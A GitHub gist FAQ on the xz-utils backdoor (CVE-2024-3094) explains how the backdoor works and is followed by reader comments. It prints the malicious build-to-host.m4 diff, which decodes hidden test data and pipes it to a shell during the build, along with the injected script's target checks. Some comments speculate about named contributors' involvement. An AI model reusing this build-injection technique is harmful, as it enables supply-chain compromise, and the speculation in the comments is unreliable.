Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active May 16, 2024 19:46
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@christoofar
Copy link

christoofar commented Apr 4, 2024

The blog post is also not good proof. Dude sounds like he's new to the codebase, which he might really be!

He created a blog, and made one post, about his excitement of Jia's optimized memory allocator.

Which is not an optimized memory allocator. 💅

If he was excited about RISCV support going into liblzma, he would have finished the CPython binding changes and write one test to just pass a simple array to liblzma with the feature flags turned on.

If he was performance testing his board for some project, he could have forked CPython to stuff test bloat oh cool no local tests in his own fork, he shipped all the edits over... and convenience scripts (none in his fork) then called Jia and ask him to pull them down so Jia can then pin a launcher from the CPython testbed to see what's going on. Iiiiiiiii dunnnnoooo I would have left my tests in my fork and cherry pick out of that branch what I want to send to CPython if I had a board in my lap and wanted Jia's change so I can make that supercool, supercompacted whatever.

Just.... think about it.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys.
If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off.
Or just filter your logs another way and snigger at them wasting their time rattling your door.

@0x1eef
Copy link

0x1eef commented Apr 4, 2024

@pillowtrucker

... or if you're genuinely a low iq schizophrenic.

There's no need for that, and you don't prove yourself more responsible than Z-nonymous by posting comments like that. Mental illness is not a joke, and shouldn't be used to score cheap points like that. It's not that far from racism, maybe one day you'll realize that.

@duracell
Copy link

duracell commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

@rdebath
Copy link

rdebath commented Apr 4, 2024

@duracell Nor does being on IPv6. This issue has a lot of hallmarks of being a very long term targeted attack. In that case the attacker knows who they want to attack and likely has a DNS lookup to point at them. If you want to reduce your attack surface filtering IPs is not really effective.

Reducing the libraries you link is ... for example don't link the obesity that is systemd. BTW: Don't think I'm trying to assign any blame here; but if you're not using systemd this why "libelogind0" exists at all and that may be a reasonable way to break the attack chain. It's one of the things that gives me a relaxed attitude to this exploit.

These are also the reasons I think this exploit is a failure, it was discovered too soon.
Thank you "Andres Freund".

@bogd
Copy link

bogd commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

@duracell
Copy link

duracell commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

But to say something about this, here is my point:
Your general anti-“too difficult to scan” message is bs.
Slide 16 says:

  • It is true that address space scanning will be somewhat harder
  • Ha Ha, think botnet scanning and a black market in hot space
  1. It's says “harder”! 2. 17 YEARS are gone, and where is the proof about the 2nd point?

And this is just a presentation.
You should look at the current stages of public scanning or even paper from akamai.
The truth is: Scanning is a lot, lot harder and for the whole space nearly impossible for a single person or even a normal-sized group without a lot of money. Regular scanning even more.
Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

@orangepizza
Copy link

orangepizza commented Apr 4, 2024 via email

@bogd
Copy link

bogd commented Apr 4, 2024

I never said anything about ipv6, I only said fail2ban and brute-force protection will not help with such exploits.

I was not replying to you, but to a different message that was quoting you (and in turn it was referring to a message from @christoofar ). Yes, I agree with you on the fail2ban part - it will not protect you from such an exploit. And probably none of the other mentioned workarounds will protect you against an application-level exploit/backdoor.

As for the second part, you missed the point entirely. :) . Yes, IPv6 scanning is harder (nobody ever contested that), but that doesn't mean that this can be used as a "security mechanism". That was what the "ha ha" on the slide was about.

Your first link seems to only talk about IPv4 scanning (and I did not see any relevant statistics on that page).

where is the proof about the 2nd point?

Probably waiting (together with the rest of us) for large-scale IPv6 adoption :p . Even the paper you linked says that:

"It may well be that the relative rarity of largescale IPv6 scans is simply the result of the inability to “cheaply” find destination addresses to probe. However, we argue this situation may quickly change if and when targetable IPv6 addresses become more available, be it due to advances in target generation algorithms, or exposure of addresses, e.g., via peer-to-peer applications or other rendezvous mechanisms employed by future applications"

Anyway, this is not the place for this conversation. Let us get back to the interesting part, the current exploit. :)

@christoofar
Copy link

christoofar commented Apr 4, 2024

@duracell Nor does being on IPv6.

Network engineer here, so I do not have the know-how to talk about the code. But I have seen this idea of "just move to IPv6, everything will be solved there!" too many times not to reply.

For anyone thinking that IPv6 will solve the issue by just being "too difficult to scan", please think again. I still remember a 2007 presentation by Randy Bush, that explains this very well (slide 16).

Add that to what @rdebath already mentioned (this does look like something to be used for targeted attacks, and if you have a target you generally know how to reach that).

I understand that. But the IPv4 universe is still super-fucked. Live targets compacted into a small universe white-hot with scanners. You still have to break defaults when hosting on IPv6 in the lower-temperature environment.

The shitshops/skids would be left having to use advanced techniques and rely on fewer devs and information (analyzing traffic, ingesting pilfered web logs, etc) to harvest target lists. There's just no reason, no reason at all, to put sshd hosted on defaults on to IPv4, which is what most people are doing. Every cloud provider is doing. It's crazytown.

And with xz we have now understood, very well, the issue of hot-loading, which tells you how good the code of OpenSSH has become because that was a technique few people thought feasible in a closed environment. Which systemd is reducing the temperature even more with dlopen() (it doesn't solve it).

@christoofar
Copy link

christoofar commented Apr 4, 2024

Of course, if it's a targeted attack and use publically known IP addresses, then it's not that much harder than ipv4. But for exploits in general on a widespread ipv6 can help to slow down mass attacks.

The cheapest thing to do is to go after caches of weblogs to collect/guess pools where there are clusters of hosts because Provider X misconfigured and handed out clients a small range. Like astronomers who write image filter code to sort out background stars looking for fuzzy balls that are galaxies or nebulae.

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Everyone has an Internet device talking a lot more on v6 than on v4. It's probably your phone. It's your Starlink router. The future is now. Get sshd off the IPv4 network. Just do it.

If you can't/won't, then why not shove it behind OpenVPN? Or set up port knocking? Or, as I mentioned... take a look at Yggdrasil which gives you a virtual IPv6 encrypted network with minimal fuss with way less setup headache?

@christoofar
Copy link

christoofar commented Apr 4, 2024

@christoofar Sshd is fine on IPv4. Your only "problem" is you can't make do with bad passwords; use keys. If the sh**s rattling your door are bothering you include "fail2ban" to tell them to p*s off. Or just filter your logs another way and snigger at them wasting their time rattling your door.

This doesn't help you with a vulnerable ssh version like this exploit or a bug.

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

Hot-loading is when libA which is doing just fine in production when loaded on to executable hosts, now has a change introduced because libB is going to be hot-loaded (LD_PRELOAD or, as we've seen it's systemd doing it) to make the code in libB get into memory and its initters get called, wanting to change the environment/state/data that libA usually runs under.

That's why the dlopen() changes to systemd matter.

How did liblzma get hotloaded? systemd did that (because journald), and also because OpenSSH did not want to bring in libsystemd to support its UNIX socket notify feature to signal readiness-to-serve. They have to support more OSes than just Linux (primary is BSD). Distros were taking patches to OpenSSH to get sshd to use this feature. THAT step matters because that is what created the hot-loading situation!

But any software, really, is vulnerable to hotloading. You have one thing that runs as root and pulls from an unwatched patching cycle, it is an invitation to hot-load. It doesn't have to be systemd as the root launcher, it can happen inside the ecosphere of some package you run, too.

Laughing and pointing fingers like a dumbshit saying "huhuhuh I run ${FAVORITE_OS} not a problem there"... yeah no ALL software is vuln to this.

@duracell
Copy link

duracell commented Apr 4, 2024

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh.
You connect to ssh with a specific key with includes the malicious commands. Without the ssh connection this exploit wouldn't work.
It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

@christoofar
Copy link

christoofar commented Apr 4, 2024

I should note: there's some software landscapes where hotloading is the norm because that's just the way things go. The Asterisk project is a great example. Plugins are written as C modules/patches so no-surprise that you might need X feature ("I wanna write something that injects custom SIP headers") and you need a dependency elsewhere but you don't want to touch the PJSIP module itself, or you reduce your change to a small nugget to keep up with updates to PJSIP. (Edit: you set the module loading order to your need and then launch with LD_PRELOAD to force your deps in, then your module/patch can do whatever it needs to do to PJSIP. This is just how things work over there.)

In closed-soure vendor land that behavior is everywhere.

Dependency hijacking is a thing .NET people have been dealing with for eons now and they are further ahead (lib signing, centralized and well-understood assembly loading behavior, etc). But, again... everything everywhere is subject to hotloading. Just like injected static includes creeping into an unprotected repo, it can be dynamic, too.

@christoofar
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.

If you want to be precise, ssh was the vulnerable component, because the attack targets ssh and the functions of ssh. You connect to ssh with a specific key with includes the malicious commands. Without the ssh connection this exploit wouldn't work. It is indeed not a bug or exploit in the (upstream) ssh code itself. It was vulnerable because of the patches, but it was the vulnerable part to the outside and a necessary part of the exploit.

I'm going to target your dishwasher. Your dishwasher is the vulnerable component.

@dnorthup-ums
Copy link

dnorthup-ums commented Apr 4, 2024

@thesamesam
Sam, et al:
I think there's another "Easter Egg" in there... Looking again, closely, at Lasse's f9cf4c05 commit (the tukaani repo) and his 02e35059 commit, and then re-reading the build tools scripts, it looks like "Jia" intended to be able to use TCP connections from inside of XZ on platforms built with CMAKE. There's got to be some way to invoke that. Perhaps he hadn't finished implementing that part yet..., but I think that somebody with better fuzzing skills than mine should give it a close look. The good news is that Lasse re-enabled the Landlock function for CMAKE builds...., presuming that "Jia" hadn't hidden something in the Landlock code.

@christoofar
Copy link

christoofar commented Apr 4, 2024

By the way, I have not proven our enthusiastic CPython user is guilty beyond a reasonable doubt of being Team Jia, but this is the most stinky fish of all the associated cross-committers looking to push up Jia's changes.

It's not that Mr. CPython found a 0day in decrypt/encrypt... my suspicion is the audience that Mr. CPython would have created with his PR to CPython. The test he submitted cannot be run unless you force up the dependency, because in the binding code the feature flag is tied to the release level of liblzma. Tinkerboard people tend to be IT professions with day jobs in corporate land. I don't know anyone around me in my inner circle, that is a nerd, who doesn't have a tinkerboard. Granted, not RISCV... but RISCV I'm going to assume audience is the same and more avid tinkerboard project users.

And even if Mr. CPython is completely innocent here... the adoption to push up is there, and when CPython lands for all chipsets and OS platforms everyone's Python code using lzma whether they know it or not will host Jia. Jia now has a worldwide entrypoint to ship to everything, everywhere, even in locked-down shit like QNX if that OS moves up because CPython did.

So... the panicky headlines from the tech press are, to some degree, justified.

Mr. CPython started a promo website all-excited about his interest in the liblzma memory allocator (that is not a memory allocator). And well, I want to testbed the CPython PR that was kicked out against Jia's RISCV feature enhancement. How much of a performance gain is this?

So I have ordered a RISCV tinkerboard off of Amazon.

@fungilife
Copy link

Let's be precise because it matters. sshd in this attack was not the vulnerable pathway. The issue is hot-loading.
If you want to be precise, ssh was the vulnerable component

I'm going to target your ..... is the vulnerable component.

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem. They will diffuse and divert the discussion to produce "doubt", "reasonable doubt", and the entire subject will be shoved under the carpet in a short while.

The fact that tests were done on an compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

@ostrosablin
Copy link

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

Not only IPv6 is a major failure (since it's adoption is still low), but due to this, it hardly gets tested in many "IPv6-ready" products, if at all.

IPv6 is usable only in corporate environments, managed by team of experienced network engineers. For most end users, it doesn't solve any real problems. In fact, it generates much more security concerns. Generally, enabling IPv6 would expose entire network to public internet. What makes it worse, some cheaper/older consumer routers don't even provide any mechanism to set up IPv6 connection filtering in their stock firmware, and would even happily expose their control panel to public internet.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

@duracell
Copy link

duracell commented Apr 4, 2024

It's not perfect. Stop poo-pooing IPv6 because it isn't perfect. It is still preferable to v4.

So, unless you really know what you're doing, IPv4 is the only way to go. Because being behind NAT gives a default opt-in behavior to accepting connections. On other hand, IPv6 emphasizes direct connectivity, so it's much easier to accidentally backdoor a private network by exposing sensitive services, meant to be run privately to public internet.

And xz-utils situation shows that moving to IPv6 would just expose you to more security risks and headaches (for example, I had xz 5.6.1 on one machine, but thankfully, I was using IPv4 and for this particular machine I didn't expose sshd to public internet).

The device which does NAT on IPv4 could and in all cases I know is also the device which does the filtering for ipv6 and on default on all consumer products does not allow any incoming connection request. So you have the same firewall security as with NAT but not the problem of port translation and other problems.

@Daniel15
Copy link

Daniel15 commented Apr 4, 2024

Some of the commit links still go to the GitHub mirror at https://github.com/tukaani-project/xz/, which is still disabled. It'd be worth updating the links to go to the upstream repo, e.g. https://git.tukaani.org/?p=xz.git;a=commitdiff;h=cf44e4b7f5dfdbf8c78aef377c10f71e274f63c0

@redcode
Copy link

redcode commented Apr 4, 2024

Has anyone tried to contact Chien Wong? He could have spoken privately with Jia Tan, and if so, he could have tried to communicate with him in Chinese. That might lead us to some other possible clue.

@dnorthup-ums
Copy link

@sectosec

The serious part is that the guy name Neustradamus also pressured to push libzma update to 5.6.0 check : microsoft/vcpkg#37197

FWIW: microsoft/vcpkg#37199 (comment)

I have no assessment either way, but just thought it worth noting...
Then again, I've also managed to get banned from gulp for pointing out that they were shipping insecure code. I've been a FLOSS project lead before so I know it can be ultra hard to figure out who to trust and how much to trust them. (This is my $Dayjob github account, not my personal one...any much of my involvement in Open Source stuff predates github anyway.)

@AdrianBunk
Copy link

Just came here to throw some links :

When someone creates a Github account solely for smearing another user, then the most suspicious person is the accuser.

After a quick look I would agree with opinions expressed elsewhere that the accused person is a bit weird, but the only connection with xz is one xz update request in one project.
"weird" includes "opened 2900 Github issues/MRs in the past 5 years", so when the accuser found a case where "a 2nd account comes in and asks for the feature" 3 months later there's no surprise that this has happened somewhere.

It would be good if everyone here refrains from participating in a witch hunt based on anonymous smearing.

@donington
Copy link

As much as I have loved the discussions brought up in this thread, I would like to see it become more centered on the task at hand - the xz code situation. Everything that people have been mentioning is interesting, but a lot of it has lost focus on the task here.

I'd like to try to submit as fact that sshd was targeted. Not because it provided weakness directly. The sideline was from an outside code base, mostly patched in. The flaw was partially how it was a network service that provided an in - the listening socket.

@christoofar
Copy link

There is so much fan-boyism going on here that you will never get a consensus that all systems without systemd couldn't possibly have this problem.

I'm not trying to "defend the BSDs" here. So don't look at it that way. Again, there's not a realistic magic thing that will stop unwanted hotloading, not even over at the "secure" OSes.

xz has taught me to get more bitchy about hotloading that I don't like. I feel that anyone sassing someone for asking "Why did you bring that in?" whether it's a FOSS discussion or at work, etc... the dev themselves are a red flag. Just explain why you brought the dep in and if you see the "ugh.. maybe a security concern?", then do the research. Look and see. Stop being a jerk.

Trying to play this unitary blame game thing is going nowhere, so we meet here.

The fact that tests were done on an compromised system with all the necessary conditions/ingredients, but sshd was started manually and no backdoor was found seems to have gone over everyone's head.

On the RE chats/discords the resistance the .o has to observing it and a great find that endbr calls are really being used as tokens to locate the calling points is genius.

(S/O to Stephano for figuring out how the locator works https://smx-smx.github.io/xzre/xzre_8h.html#details)

Meanwhile, everyone is talking xz/lzma, distros are rebuilding packages, but zstd is being built from, or hasn't since 3/29, from a preconfigured github tarball with lzma enabled (or is it not everyone doing this?).

libsystemd also put dlopen() around zstd too. This backdoor is one of the most craftiest things ever to have been written. Every decompiler shop is going to be studying this for months/years. We may need to be thinking of asking the chipset makers themselves for help. No doubt many of them too have also been thinking about this, and worried about their own machines they run.

You wanted automation and less sysadmin work, you looked down at custom scripts to setup services, .. here it came. If you leave honey out the bees and the ants will come.

Amen. Also did you notice OWASP themselves got a breach? https://therecord.media/owasp-foundation-warns-of-data-breach-resumes

@thesamesam
Copy link
Author

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@christoofar
Copy link

christoofar commented Apr 5, 2024

Can we please keep the comments here focused on edits to the gist, new resources, and new developments? There are places for general discussion of the vulnerability but I need to keep the comments section not completely polluted so I don't miss important suggestions/edits/changes. Thanks.

@thesamesam 10-4.

On the RE effort, I am wondering in the dumpouts that Jia saw from Gentoo/Debian that one of the x86_64 registers was being used as a debug marker.

Force flipping registers (but for Jia, its going to be in an obfuscated way) is a common technique in old assembly programming, back when computers had big light boards and a STOP/RUN switch somewhere where you could inspect values by hand, we all know. Focus has been so much on hunting down all the symbols, but now I think valgrind with the full register dump turned on across a bunch of projects that screamed in 5.6.0 might reveal something that's been missed. I'm off to go work on that and shut up on here :-)

@Leseratte10
Copy link

I don't think there's currently any hints that the malware itself is doing that - but if you had the SSH port exposed it's possible that the attacker has abused the malware to get code execution on your machine and could then have installed or changed whatever he wanted, so if you want to be absolutely safe you'd need to reinstall.

@fiorins
Copy link

fiorins commented Apr 5, 2024

Could Github add a check if the tarballs gets created with the code hosted on the platform ?

@AdrianBunk
Copy link

